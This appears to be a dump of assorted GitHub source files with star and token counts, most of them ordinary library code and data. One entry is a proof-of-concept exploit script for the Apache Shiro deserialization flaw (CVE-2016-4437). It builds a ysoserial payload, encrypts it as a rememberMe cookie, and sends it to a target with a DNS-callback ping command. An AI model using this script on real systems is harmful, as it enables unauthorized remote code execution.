Columns: max_stars_count (int64, 301 to 224k), text (string, lengths 6 to 1.05M), token_count (int64, 3 to 727k)
max_stars_count: 1,647
#ifndef PYTHONIC_UTILS_INT_HPP #define PYTHONIC_UTILS_INT_HPP #include "pythonic/include/utils/int_.hpp" #endif
token_count: 55
max_stars_count: 1,350
<gh_stars>1000+ [{"id":"LNAME","type":"alpha","calc":true,"value":""},{"id":"SSN","type":"ssn","calc":true,"value":""},{"id":"POLICECD","type":"number","calc":false,"value":""},{"id":"STCD_1_","type":"alpha","calc":false,"value":""},{"id":"AMT_1_","type":"number","calc":false,"value":""},{"id":"STCD_2_","type":"alpha","calc":false,"value":""},{"id":"AMT_2_","type":"number","calc":false,"value":""},{"id":"STCD_3_","type":"alpha","calc":false,"value":""},{"id":"AMT_3_","type":"number","calc":false,"value":""},{"id":"STCD_4_","type":"alpha","calc":false,"value":""},{"id":"AMT_4_","type":"number","calc":false,"value":""},{"id":"AMTTOT","type":"number","calc":true,"value":""},{"id":"NONRFND","type":"number","calc":true,"value":""},{"id":"Add_Schedule_U_Line_4","type":"link","calc":false,"value":""},{"id":"Add_Schedule_U_Line_4","type":"link","calc":false,"value":""},{"id":"EITC","type":"number","calc":false,"value":""},{"id":"RFNDBL","type":"number","calc":true,"value":""},{"id":"STATEFND","type":"number","calc":false,"value":""},{"id":"DRUGTRST","type":"number","calc":false,"value":""},{"id":"ANACOST","type":"number","calc":false,"value":""},{"id":"REFUND","type":"number","calc":true,"value":""},{"id":"OWETAX","type":"number","calc":true,"value":""}]
token_count: 417
max_stars_count: 1,995
from functools import partial from itertools import ( dropwhile, takewhile, islice, count, product, chain, starmap, filterfalse, ) import collections import types from functional.execution import ExecutionStrategies #: Defines a Transformation from a name, function, and execution_strategies Transformation = collections.namedtuple( "Transformation", ["name", "function", "execution_strategies"] ) #: Cache transformation CACHE_T = Transformation("cache", None, None) def name(function): """ Retrieve a pretty name for the function :param function: function to get name from :return: pretty name """ if isinstance(function, types.FunctionType): return function.__name__ else: return str(function) def map_t(func): """ Transformation for Sequence.map :param func: map function :return: transformation """ return Transformation( "map({0})".format(name(func)), partial(map, func), {ExecutionStrategies.PARALLEL}, ) def select_t(func): """ Transformation for Sequence.select :param func: select function :return: transformation """ return Transformation( "select({0})".format(name(func)), partial(map, func), {ExecutionStrategies.PARALLEL}, ) def starmap_t(func): """ Transformation for Sequence.starmap and Sequence.smap :param func: starmap function :return: transformation """ return Transformation( "starmap({})".format(name(func)), partial(starmap, func), {ExecutionStrategies.PARALLEL}, ) def filter_t(func): """ Transformation for Sequence.filter :param func: filter function :return: transformation """ return Transformation( "filter({0})".format(name(func)), partial(filter, func), {ExecutionStrategies.PARALLEL}, ) def where_t(func): """ Transformation for Sequence.where :param func: where function :return: transformation """ return Transformation( "where({0})".format(name(func)), partial(filter, func), {ExecutionStrategies.PARALLEL}, ) def filter_not_t(func): """ Transformation for Sequence.filter_not :param func: filter_not function :return: transformation """ return Transformation( "filter_not({0})".format(name(func)), partial(filterfalse, func), {ExecutionStrategies.PARALLEL}, ) def reversed_t(): """ Transformation for Sequence.reverse :return: transformation """ return Transformation("reversed", reversed, [ExecutionStrategies.PRE_COMPUTE]) def slice_t(start, until): """ Transformation for Sequence.slice :param start: start index :param until: until index (does not include element at until) :return: transformation """ return Transformation( "slice({0}, {1})".format(start, until), lambda sequence: islice(sequence, start, until), None, ) def distinct_t(): """ Transformation for Sequence.distinct :return: transformation """ def distinct(sequence): seen = set() for element in sequence: if element in seen: continue seen.add(element) yield element return Transformation("distinct", distinct, None) def distinct_by_t(func): """ Transformation for Sequence.distinct_by :param func: distinct_by function :return: transformation """ def distinct_by(sequence): distinct_lookup = {} for element in sequence: key = func(element) if key not in distinct_lookup: distinct_lookup[key] = element return distinct_lookup.values() return Transformation("distinct_by({0})".format(name(func)), distinct_by, None) def sorted_t(key=None, reverse=False): """ Transformation for Sequence.sorted :param key: key to sort by :param reverse: reverse or not :return: transformation """ return Transformation( "sorted", lambda sequence: sorted(sequence, key=key, reverse=reverse), None ) def order_by_t(func): """ Transformation for Sequence.order_by 
:param func: order_by function :return: transformation """ return Transformation( "order_by({0})".format(name(func)), lambda sequence: sorted(sequence, key=func), None, ) def drop_right_t(n): """ Transformation for Sequence.drop_right :param n: number to drop from right :return: transformation """ if n <= 0: end_index = None else: end_index = -n return Transformation( "drop_right({0})".format(n), lambda sequence: sequence[:end_index], [ExecutionStrategies.PRE_COMPUTE], ) def drop_t(n): """ Transformation for Sequence.drop :param n: number to drop from left :return: transformation """ return Transformation( "drop({0})".format(n), lambda sequence: islice(sequence, n, None), None ) def drop_while_t(func): """ Transformation for Sequence.drop_while :param func: drops while func is true :return: transformation """ return Transformation( "drop_while({0})".format(name(func)), partial(dropwhile, func), None ) def take_t(n): """ Transformation for Sequence.take :param n: number to take :return: transformation """ return Transformation( "take({0})".format(n), lambda sequence: islice(sequence, 0, n), None ) def take_while_t(func): """ Transformation for Sequence.take_while :param func: takes while func is True :return: transformation """ return Transformation( "take_while({0})".format(name(func)), partial(takewhile, func), None ) def flat_map_impl(func, sequence): """ Implementation for flat_map_t :param func: function to map :param sequence: sequence to flat_map over :return: flat_map generator """ for element in sequence: for value in func(element): yield value def flat_map_t(func): """ Transformation for Sequence.flat_map :param func: function to flat_map :return: transformation """ return Transformation( "flat_map({0})".format(name(func)), partial(flat_map_impl, func), {ExecutionStrategies.PARALLEL}, ) def flatten_t(): """ Transformation for Sequence.flatten :return: transformation """ return Transformation( "flatten", partial(flat_map_impl, lambda x: x), {ExecutionStrategies.PARALLEL} ) def zip_t(zip_sequence): """ Transformation for Sequence.zip :param zip_sequence: sequence to zip with :return: transformation """ return Transformation( "zip(<sequence>)", lambda sequence: zip(sequence, zip_sequence), None ) def zip_with_index_t(start): """ Transformation for Sequence.zip_with_index :return: transformation """ return Transformation( "zip_with_index", lambda sequence: zip(sequence, count(start=start)), None ) def enumerate_t(start): """ Transformation for Sequence.enumerate :param start: start index for enumerate :return: transformation """ return Transformation( "enumerate", lambda sequence: enumerate(sequence, start=start), None ) def cartesian_t(iterables, repeat): """ Transformation for Sequence.cartesian :param iterables: elements for cartesian product :param repeat: how many times to repeat iterables :return: transformation """ return Transformation( "cartesian", lambda sequence: product(sequence, *iterables, repeat=repeat), None ) def init_t(): """ Transformation for Sequence.init :return: transformation """ return Transformation( "init", lambda sequence: sequence[:-1], {ExecutionStrategies.PRE_COMPUTE} ) def tail_t(): """ Transformation for Sequence.tail :return: transformation """ return Transformation("tail", lambda sequence: islice(sequence, 1, None), None) def inits_t(wrap): """ Transformation for Sequence.inits :param wrap: wrap children values with this :return: transformation """ return Transformation( "inits", lambda sequence: [ wrap(sequence[:i]) for i in 
reversed(range(len(sequence) + 1)) ], {ExecutionStrategies.PRE_COMPUTE}, ) def tails_t(wrap): """ Transformation for Sequence.tails :param wrap: wrap children values with this :return: transformation """ return Transformation( "tails", lambda sequence: [wrap(sequence[i:]) for i in range(len(sequence) + 1)], {ExecutionStrategies.PRE_COMPUTE}, ) def union_t(other): """ Transformation for Sequence.union :param other: sequence to union with :return: transformation """ return Transformation("union", lambda sequence: set(sequence).union(other), None) def intersection_t(other): """ Transformation for Sequence.intersection :param other: sequence to intersect with :return: transformation """ return Transformation( "intersection", lambda sequence: set(sequence).intersection(other), None ) def difference_t(other): """ Transformation for Sequence.difference :param other: sequence to different with :return: transformation """ return Transformation( "difference", lambda sequence: set(sequence).difference(other), None ) def symmetric_difference_t(other): """ Transformation for Sequence.symmetric_difference :param other: sequence to symmetric_difference with :return: transformation """ return Transformation( "symmetric_difference", lambda sequence: set(sequence).symmetric_difference(other), None, ) def group_by_key_impl(sequence): """ Implementation for group_by_key_t :param sequence: sequence to group :return: grouped sequence """ result = {} for element in sequence: if result.get(element[0]): result.get(element[0]).append(element[1]) else: result[element[0]] = [element[1]] return result.items() def group_by_key_t(): """ Transformation for Sequence.group_by_key :return: transformation """ return Transformation("group_by_key", group_by_key_impl, None) def reduce_by_key_impl(func, sequence): """ Implementation for reduce_by_key_t :param func: reduce function :param sequence: sequence to reduce :return: reduced sequence """ result = {} for key, value in sequence: if key in result: result[key] = func(result[key], value) else: result[key] = value return result.items() def reduce_by_key_t(func): """ Transformation for Sequence.reduce_by_key :param func: reduce function :return: transformation """ return Transformation( "reduce_by_key({0})".format(name(func)), partial(reduce_by_key_impl, func), None ) def accumulate_impl(func, sequence): # pylint: disable=no-name-in-module """ Implementation for accumulate :param sequence: sequence to accumulate :param func: accumulate function """ from itertools import accumulate return accumulate(sequence, func) def accumulate_t(func): """ Transformation for Sequence.accumulate """ return Transformation( "accumulate({0})".format(name(func)), partial(accumulate_impl, func), None ) def count_by_key_impl(sequence): """ Implementation for count_by_key_t :param sequence: sequence of (key, value) pairs :return: counts by key """ counter = collections.Counter() for key, _ in sequence: counter[key] += 1 return counter.items() def count_by_key_t(): """ Transformation for Sequence.count_by_key :return: transformation """ return Transformation("count_by_key", count_by_key_impl, None) def count_by_value_impl(sequence): """ Implementation for count_by_value_t :param sequence: sequence of values :return: counts by value """ counter = collections.Counter() for e in sequence: counter[e] += 1 return counter.items() def count_by_value_t(): """ Transformation for Sequence.count_by_value :return: transformation """ return Transformation("count_by_value", count_by_value_impl, None) def 
group_by_impl(func, sequence): """ Implementation for group_by_t :param func: grouping function :param sequence: sequence to group :return: grouped sequence """ result = {} for element in sequence: if result.get(func(element)): result.get(func(element)).append(element) else: result[func(element)] = [element] return result.items() def group_by_t(func): """ Transformation for Sequence.group_by :param func: grouping function :return: transformation """ return Transformation( "group_by({0})".format(name(func)), partial(group_by_impl, func), None ) def grouped_impl(size, sequence): """ Implementation for grouped_t :param size: size of groups :param sequence: sequence to group :return: grouped sequence """ iterator = iter(sequence) try: while True: batch = islice(iterator, size) yield list(chain((next(batch),), batch)) except StopIteration: return def grouped_t(size): """ Transformation for Sequence.grouped :param size: size of groups :return: transformation """ return Transformation( "grouped({0})".format(size), partial(grouped_impl, size), None ) def sliding_impl(wrap, size, step, sequence): """ Implementation for sliding_t :param wrap: wrap children values with this :param size: size of window :param step: step size :param sequence: sequence to create sliding windows from :return: sequence of sliding windows """ i = 0 n = len(sequence) while i + size <= n or (step != 1 and i < n): yield wrap(sequence[i : i + size]) i += step def sliding_t(wrap, size, step): """ Transformation for Sequence.sliding :param wrap: wrap children values with this :param size: size of window :param step: step size :return: transformation """ return Transformation( "sliding({0}, {1})".format(size, step), partial(sliding_impl, wrap, size, step), {ExecutionStrategies.PRE_COMPUTE}, ) def partition_impl(wrap, predicate, sequence): truthy_partition = [] falsy_partition = [] for e in sequence: if predicate(e): truthy_partition.append(e) else: falsy_partition.append(e) return wrap((wrap(truthy_partition), wrap(falsy_partition))) def partition_t(wrap, func): """ Transformation for Sequence.partition :param wrap: wrap children values with this :param func: partition function :return: transformation """ return Transformation( "partition({0})".format(name(func)), partial(partition_impl, wrap, func), None ) def inner_join_impl(other, sequence): """ Implementation for part of join_impl :param other: other sequence to join with :param sequence: first sequence to join with :return: joined sequence """ seq_dict = {} for element in sequence: seq_dict[element[0]] = element[1] seq_kv = seq_dict other_kv = dict(other) keys = seq_kv.keys() if len(seq_kv) < len(other_kv) else other_kv.keys() result = {} for k in keys: if k in seq_kv and k in other_kv: result[k] = (seq_kv[k], other_kv[k]) return result.items() def join_impl(other, join_type, sequence): """ Implementation for join_t :param other: other sequence to join with :param join_type: join type (inner, outer, left, right) :param sequence: first sequence to join with :return: joined sequence """ if join_type == "inner": return inner_join_impl(other, sequence) seq_dict = {} for element in sequence: seq_dict[element[0]] = element[1] seq_kv = seq_dict other_kv = dict(other) if join_type == "left": keys = seq_kv.keys() elif join_type == "right": keys = other_kv.keys() elif join_type == "outer": keys = set(list(seq_kv.keys()) + list(other_kv.keys())) else: raise TypeError("Wrong type of join specified") result = {} for k in keys: result[k] = (seq_kv.get(k), other_kv.get(k)) return 
result.items() def join_t(other, join_type): """ Transformation for Sequence.join, Sequence.inner_join, Sequence.outer_join, Sequence.right_join, and Sequence.left_join :param other: other sequence to join with :param join_type: join type from left, right, inner, and outer :return: transformation """ return Transformation( "{0}_join".format(join_type), partial(join_impl, other, join_type), None )
token_count: 6,540
max_stars_count: 1,561
<gh_stars>1000+ /* * Copyright 2021 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package cloudsql.tink; // [START cloud_sql_sqlserver_cse_key] import com.google.crypto.tink.Aead; import com.google.crypto.tink.KmsClient; import com.google.crypto.tink.aead.AeadConfig; import com.google.crypto.tink.aead.AeadKeyTemplates; import com.google.crypto.tink.aead.KmsEnvelopeAead; import com.google.crypto.tink.integration.gcpkms.GcpKmsClient; import java.security.GeneralSecurityException; public class CloudKmsEnvelopeAead { public static Aead get(String kmsUri) throws GeneralSecurityException { AeadConfig.register(); // Create a new KMS Client KmsClient client = new GcpKmsClient().withDefaultCredentials(); // Create an AEAD primitive using the Cloud KMS key Aead gcpAead = client.getAead(kmsUri); // Create an envelope AEAD primitive. // This key should only be used for client-side encryption to ensure authenticity and integrity // of data. return new KmsEnvelopeAead(AeadKeyTemplates.AES128_GCM, gcpAead); } } // [END cloud_sql_sqlserver_cse_key]
token_count: 520
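The CloudKmsEnvelopeAead sample above only builds the envelope AEAD primitive. Below is a minimal sketch of how a caller might use the returned Aead; the key URI, column value, and associated-data string are illustrative assumptions rather than part of the original sample, while Aead.encrypt/decrypt is Tink's standard API.

package cloudsql.tink;

import com.google.crypto.tink.Aead;
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;

public class EnvelopeAeadUsage {
  public static void main(String[] args) throws GeneralSecurityException {
    // Illustrative key URI; a real one must point at an existing Cloud KMS key.
    String kmsUri =
        "gcp-kms://projects/my-project/locations/global/keyRings/my-ring/cryptoKeys/my-key";
    Aead aead = CloudKmsEnvelopeAead.get(kmsUri);

    // Associated data binds the ciphertext to its context (here a hypothetical
    // row id) without being encrypted itself; the same value is needed to decrypt.
    byte[] plaintext = "555-55-5555".getBytes(StandardCharsets.UTF_8);
    byte[] associatedData = "votes:row:42".getBytes(StandardCharsets.UTF_8);

    byte[] ciphertext = aead.encrypt(plaintext, associatedData);
    byte[] decrypted = aead.decrypt(ciphertext, associatedData);
    System.out.println(new String(decrypted, StandardCharsets.UTF_8));
  }
}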
max_stars_count: 1,043
<filename>micro-events/src/main/java/com/oath/micro/server/events/StartedAt.java package com.oath.micro.server.events; public interface StartedAt { public long getStartedAt(); }
token_count: 61
max_stars_count: 2,112
/** * Autogenerated by Thrift * * DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING * @generated */ package test.fixtures.enums; import com.facebook.swift.codec.*; @SwiftGenerated public enum Metasyntactic { FOO(1), BAR(2), BAZ(3), BAX(4); private final int value; Metasyntactic(int value) { this.value = value; } @ThriftEnumValue public int getValue() { return value; } public static Metasyntactic fromInteger(int n) { switch (n) { case 1: return FOO; case 2: return BAR; case 3: return BAZ; case 4: return BAX; default: return null; } } }
token_count: 369
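Because the generated fromInteger above returns null for integers outside 1-4, callers decoding raw Thrift values need a null check. A small hedged example follows; the fallback to FOO is an arbitrary choice for illustration, not part of the generated code.

package test.fixtures.enums;

public class MetasyntacticDecodeExample {
  // Decode a raw wire value, falling back to FOO when it is unknown
  // (Metasyntactic.fromInteger returns null in that case).
  static Metasyntactic decodeOrDefault(int wireValue) {
    Metasyntactic m = Metasyntactic.fromInteger(wireValue);
    return m != null ? m : Metasyntactic.FOO;
  }

  public static void main(String[] args) {
    System.out.println(decodeOrDefault(3));            // BAZ
    System.out.println(decodeOrDefault(99));           // FOO (unknown value)
    System.out.println(Metasyntactic.BAR.getValue());  // 2
  }
}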
max_stars_count: 347
<reponame>hbraha/ovirt-engine package org.ovirt.engine.core.bll.executor; public interface CommandControllerMXBean { void monitorAll(boolean monitor); void monitorActions(boolean monitor); void monitorQueries(boolean monitor); void monitorVdsBroker(boolean monitor); boolean isMonitorActionsEnabled(); boolean isMonitorQueriesEnabled(); boolean isMonitorVdsBrokerEnabled(); }
token_count: 131
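The CommandControllerMXBean interface above follows the JMX MXBean naming convention, so an implementation can be exposed through the platform MBean server. A hedged sketch follows; the registration helper and the object name are hypothetical, not taken from ovirt-engine.

import java.lang.management.ManagementFactory;
import javax.management.MBeanServer;
import javax.management.ObjectName;

import org.ovirt.engine.core.bll.executor.CommandControllerMXBean;

public class CommandControllerRegistration {
  // Registers a CommandControllerMXBean implementation under an illustrative
  // JMX object name so monitoring can be toggled from a JMX console.
  public static void register(CommandControllerMXBean controller) throws Exception {
    MBeanServer server = ManagementFactory.getPlatformMBeanServer();
    ObjectName name = new ObjectName("org.ovirt.engine:type=CommandController");
    server.registerMBean(controller, name);
  }
}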
max_stars_count: 404
<filename>java-backend/src/main/java/org/kframework/backend/java/symbolic/VariableOccurrencesCounter.java // Copyright (c) 2014-2019 K Team. All Rights Reserved. package org.kframework.backend.java.symbolic; import org.kframework.backend.java.kil.Term; import org.kframework.backend.java.kil.Variable; import com.google.common.collect.HashMultiset; import com.google.common.collect.Multiset; /** * Counts the occurrences of all variables inside a {@link Term}. * * @author YilongL * */ public class VariableOccurrencesCounter extends BottomUpVisitor { private final Multiset<Variable> variables = HashMultiset.create(); private VariableOccurrencesCounter() { } @Override public void visit(Variable variable) { variables.add(variable); } public static Multiset<Variable> count(Term term) { VariableOccurrencesCounter counter = new VariableOccurrencesCounter(); term.accept(counter); return counter.variables; } }
token_count: 324
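VariableOccurrencesCounter.count above returns a Guava Multiset, so callers can ask how often each variable appears. A hedged usage sketch follows; constructing a Term is omitted because it depends on the K framework's internal machinery, and the non-linearity check is only an illustration of how the counts might be consumed.

import com.google.common.collect.Multiset;

import org.kframework.backend.java.kil.Term;
import org.kframework.backend.java.kil.Variable;
import org.kframework.backend.java.symbolic.VariableOccurrencesCounter;

public class VariableOccurrencesExample {
  // 'term' must be produced elsewhere by the K framework; only the query side
  // of the counter is shown here.
  static void reportNonLinearVariables(Term term) {
    Multiset<Variable> occurrences = VariableOccurrencesCounter.count(term);
    for (Multiset.Entry<Variable> entry : occurrences.entrySet()) {
      if (entry.getCount() > 1) {
        // A count above 1 means the variable occurs non-linearly in the term.
        System.out.println(entry.getElement() + " occurs " + entry.getCount() + " times");
      }
    }
  }
}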
max_stars_count: 1,980
#include "modules_enum.h" #include <psapi.h> #pragma comment(lib,"psapi.lib") size_t pesieve::util::enum_modules(IN HANDLE hProcess, IN OUT HMODULE hMods[], IN const DWORD hModsMax, IN DWORD filters) //throws exceptions { if (hProcess == nullptr) { return 0; } const char err_msg[] = "Could not enumerate modules. "; DWORD cbNeeded; #ifdef _WIN64 if (!EnumProcessModulesEx(hProcess, hMods, hModsMax, &cbNeeded, filters)) { throw std::runtime_error(err_msg); return 0; } #else /* Some old, 32-bit versions of Windows do not have EnumProcessModulesEx, but we can use EnumProcessModules for the 32-bit version: it will work the same and prevent the compatibility issues. */ if (!EnumProcessModules(hProcess, hMods, hModsMax, &cbNeeded)) { throw std::runtime_error(err_msg); return 0; } #endif const size_t modules_count = cbNeeded / sizeof(HMODULE); return modules_count; }
token_count: 330
max_stars_count: 348
{"nom":"Saint-Félix","circ":"2ème circonscription","dpt":"Lot","inscrits":359,"abs":161,"votants":198,"blancs":13,"nuls":9,"exp":176,"res":[{"nuance":"REM","nom":"<NAME>","voix":100},{"nuance":"SOC","nom":"<NAME>","voix":76}]}
token_count: 91
max_stars_count: 1,770
<filename>hyperion-sqlite/src/main/java/com/willowtreeapps/hyperion/sqlite/presentation/database/DatabaseListActivity.java package com.willowtreeapps.hyperion.sqlite.presentation.database; import android.os.Bundle; import androidx.annotation.Nullable; import androidx.appcompat.app.ActionBar; import androidx.appcompat.app.AppCompatActivity; import androidx.recyclerview.widget.LinearLayoutManager; import androidx.recyclerview.widget.RecyclerView; import androidx.appcompat.widget.Toolbar; import com.willowtreeapps.hyperion.plugin.v1.HyperionIgnore; import com.willowtreeapps.hyperion.sqlite.R; import com.willowtreeapps.hyperion.sqlite.presentation.tables.TablesListActivity; import java.util.ArrayList; import java.util.HashSet; import java.util.List; import java.util.Set; @HyperionIgnore public class DatabaseListActivity extends AppCompatActivity implements DatabaseListAdapter.OnDatabaseSelectedListener { @Override protected void onCreate(@Nullable Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.hsql_database_list); setSupportActionBar((Toolbar) findViewById(R.id.hsql_toolbar)); ActionBar actionBar = getSupportActionBar(); if (actionBar != null) { actionBar.setDisplayHomeAsUpEnabled(true); actionBar.setTitle(R.string.hsql_database_list_heading); } final RecyclerView list = findViewById(R.id.hsql_list); list.setLayoutManager(new LinearLayoutManager(this)); final List<String> databaseList = fetchDatabaseList(); DatabaseListAdapter adapter = new DatabaseListAdapter(databaseList); adapter.setListener(this); list.setAdapter(adapter); } @Override public boolean onSupportNavigateUp() { onBackPressed(); return true; } private List<String> fetchDatabaseList() { Set<String> dbNames = new HashSet<>(); for (String db : databaseList()) { if (!db.endsWith("-journal") && !db.endsWith("-wal") && !db.endsWith("-shm")) { dbNames.add(db); } } return new ArrayList<>(dbNames); } @Override public void onClick(String databaseName) { TablesListActivity.startActivity(this, databaseName); } }
token_count: 863
max_stars_count: 12,718
#if __mips_isa_rev < 6 #define LLSC_M "m" #else #define LLSC_M "ZC" #endif #define a_ll a_ll static inline int a_ll(volatile int *p) { int v; #if __mips < 2 __asm__ __volatile__ ( ".set push ; .set mips2\n\t" "ll %0, %1" "\n\t.set pop" : "=r"(v) : "m"(*p)); #else __asm__ __volatile__ ( "ll %0, %1" : "=r"(v) : LLSC_M(*p)); #endif return v; } #define a_sc a_sc static inline int a_sc(volatile int *p, int v) { int r; #if __mips < 2 __asm__ __volatile__ ( ".set push ; .set mips2\n\t" "sc %0, %1" "\n\t.set pop" : "=r"(r), "=m"(*p) : "0"(v) : "memory"); #else __asm__ __volatile__ ( "sc %0, %1" : "=r"(r), "="LLSC_M(*p) : "0"(v) : "memory"); #endif return r; } #define a_barrier a_barrier static inline void a_barrier() { #if __mips < 2 /* mips2 sync, but using too many directives causes * gcc not to inline it, so encode with .long instead. */ __asm__ __volatile__ (".long 0xf" : : : "memory"); #else __asm__ __volatile__ ("sync" : : : "memory"); #endif } #define a_pre_llsc a_barrier #define a_post_llsc a_barrier #undef LLSC_M
token_count: 524
max_stars_count: 558
<reponame>leroyjvargis/workflows // SPDX-License-Identifier: BSD-3-Clause // // Copyright (C) 2021 Micron Technology, Inc. // // This code is derived from and modifies the LevelDB project. #include "hse_binding/hse_kvs_cursor.h" #include <hse/hse.h> #include "leveldb/status.h" namespace leveldb { static const int MSG_SIZE = 100; HseKvsCursor::HseKvsCursor(hse_kvs_cursor* handle) : kvs_cursor_handle_(handle), current_key_(nullptr), current_value_(nullptr), current_key_size_(0), current_value_size_(0), valid_(false) {} HseKvsCursor::~HseKvsCursor() { if (kvs_cursor_handle_ != nullptr) { hse_kvs_cursor_destroy(kvs_cursor_handle_); } } Slice HseKvsCursor::key() { return Slice((const char*)current_key_, current_key_size_); } Slice HseKvsCursor::value() { return Slice((const char*)current_value_, current_value_size_); } void HseKvsCursor::Read() { hse_err_t err; bool eof; err = hse_kvs_cursor_read(kvs_cursor_handle_, 0, &current_key_, &current_key_size_, &current_value_, &current_value_size_, &eof); if (err) { char msg[MSG_SIZE]; valid_ = false; current_key_ = nullptr; current_value_ = nullptr; hse_strerror(err, msg, sizeof(msg)); std::fprintf(stderr, "cursor read error: %s\n", msg); } else if (eof) { valid_ = false; } else { valid_ = true; } } void HseKvsCursor::Seek(const Slice& target) { hse_err_t err; err = hse_kvs_cursor_seek(kvs_cursor_handle_, 0, target.data(), target.size(), nullptr, nullptr); if (err) { char msg[MSG_SIZE]; hse_strerror(err, msg, sizeof(msg)); std::fprintf(stderr, "cursor seek error: %s\n", msg); valid_ = false; } else { valid_ = true; } } bool HseKvsCursor::Valid() { return valid_; } } // namespace leveldb
token_count: 871
max_stars_count: 582
<filename>pocs/apache_shrio_deserialize_CVE-2016-4437/2.py # -*- encoding:utf-8 -*- import sys import base64 import uuid import subprocess import requests from Crypto.Cipher import AES def encode_rememberme(command): JAR_FILE = './ysoserial-0.0.6-SNAPSHOT-BETA-all.jar' popen = subprocess.Popen(['java', '-jar',JAR_FILE, 'CommonsCollections2', command], stdout=subprocess.PIPE) BS = AES.block_size pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() key = "<KEY>" mode = AES.MODE_CBC iv = uuid.uuid4().bytes encryptor = AES.new(base64.b64decode(key), mode, iv) file_body = pad(popen.stdout.read()) base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body)) return base64_ciphertext def request(url,headers): requests.post(url=url, data="", headers=headers,verify=False) if __name__ == '__main__': url= "http://1172.16.17.32/login.do" cmd= "ping apache.dnslog.org" payload = encode_rememberme(cmd) headers = { "Cookie": "rememberMe=%s" % (payload.decode()) } print payload request(url,headers) print "END===="
token_count: 464
max_stars_count: 651
package net.serenitybdd.screenplay.jenkins; import net.serenitybdd.screenplay.Actor; import java.util.UUID; public class JenkinsUser extends Actor { public static JenkinsUser named(String username) { return new JenkinsUser(username, UUID.randomUUID().toString()); } private final String password; public JenkinsUser(String name, String password) { super(name); this.password = password; } public String password() { return password; } }
token_count: 177
max_stars_count: 759
<reponame>tonytw1/rome /* * Opml10Generator.java * * Created on April 24, 2006, 11:35 PM * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.rometools.opml.io.impl; import java.util.ArrayList; import java.util.Collections; import java.util.List; import java.util.Locale; import org.jdom2.Document; import org.jdom2.Element; import com.rometools.opml.feed.opml.Attribute; import com.rometools.opml.feed.opml.Opml; import com.rometools.opml.feed.opml.Outline; import com.rometools.rome.feed.WireFeed; import com.rometools.rome.io.FeedException; import com.rometools.rome.io.WireFeedGenerator; import com.rometools.rome.io.impl.BaseWireFeedGenerator; import com.rometools.rome.io.impl.DateParser; public class OPML10Generator extends BaseWireFeedGenerator implements WireFeedGenerator { public OPML10Generator() { super("opml_1.0"); } public OPML10Generator(final String type) { super(type); } /** * Creates an XML document (JDOM) for the given feed bean. * * @param feed the feed bean to generate the XML document from. * @return the generated XML document (JDOM). * @throws IllegalArgumentException thrown if the type of the given feed bean does not match with the type of the * WireFeedGenerator. * @throws FeedException thrown if the XML Document could not be created. */ @Override public Document generate(final WireFeed feed) throws IllegalArgumentException, FeedException { if (!(feed instanceof Opml)) { throw new IllegalArgumentException("Not an OPML file"); } final Opml opml = (Opml) feed; final Document doc = new Document(); final Element root = new Element("opml"); root.setAttribute("version", "1.0"); doc.addContent(root); final Element head = generateHead(opml); if (head != null) { root.addContent(head); } final Element body = new Element("body"); root.addContent(body); super.generateFeedModules(opml.getModules(), root); body.addContent(generateOutlines(opml.getOutlines())); return doc; } protected boolean addNotNullAttribute(final Element target, final String name, final Object value) { if (target == null || name == null || value == null) { return false; } target.setAttribute(name, value.toString()); return true; } protected boolean addNotNullSimpleElement(final Element target, final String name, final Object value) { if (target == null || name == null || value == null) { return false; } final Element e = new Element(name); e.addContent(value.toString()); target.addContent(e); return true; } protected Element generateHead(final Opml opml) { final Element head = new Element("head"); boolean hasHead = false; if (opml.getCreated() != null) { hasHead |= addNotNullSimpleElement(head, "dateCreated", DateParser.formatRFC822(opml.getCreated(), Locale.US)); } hasHead |= addNotNullSimpleElement(head, "expansionState", intArrayToCsvString(opml.getExpansionState())); if (opml.getModified() != null) { hasHead |= addNotNullSimpleElement(head, "dateModified", DateParser.formatRFC822(opml.getModified(), Locale.US)); } hasHead |= addNotNullSimpleElement(head, "ownerEmail", opml.getOwnerEmail()); hasHead |= 
addNotNullSimpleElement(head, "ownerName", opml.getOwnerName()); hasHead |= addNotNullSimpleElement(head, "title", opml.getTitle()); hasHead |= addNotNullSimpleElement(head, "vertScrollState", opml.getVerticalScrollState()); hasHead |= addNotNullSimpleElement(head, "windowBottom", opml.getWindowBottom()); hasHead |= addNotNullSimpleElement(head, "windowLeft", opml.getWindowLeft()); hasHead |= addNotNullSimpleElement(head, "windowRight", opml.getWindowRight()); hasHead |= addNotNullSimpleElement(head, "windowTop", opml.getWindowTop()); if (hasHead) { return head; } else { return null; } } protected Element generateOutline(final Outline outline) { final Element e = new Element("outline"); addNotNullAttribute(e, "text", outline.getText()); addNotNullAttribute(e, "type", outline.getType()); addNotNullAttribute(e, "title", outline.getTitle()); if (outline.isBreakpoint()) { addNotNullAttribute(e, "isBreakpoint", "true"); } if (outline.isComment()) { addNotNullAttribute(e, "isComment", "true"); } final List<Attribute> atts = Collections.synchronizedList(outline.getAttributes()); for (int i = 0; i < atts.size(); i++) { final Attribute att = atts.get(i); addNotNullAttribute(e, att.getName(), att.getValue()); } super.generateItemModules(outline.getModules(), e); e.addContent(generateOutlines(outline.getChildren())); return e; } protected List<Element> generateOutlines(final List<Outline> outlines) { final ArrayList<Element> elements = new ArrayList<Element>(); for (int i = 0; outlines != null && i < outlines.size(); i++) { elements.add(generateOutline(outlines.get(i))); } return elements; } protected String intArrayToCsvString(final int[] value) { if (value == null || value.length == 0) { return null; } final StringBuffer sb = new StringBuffer(); 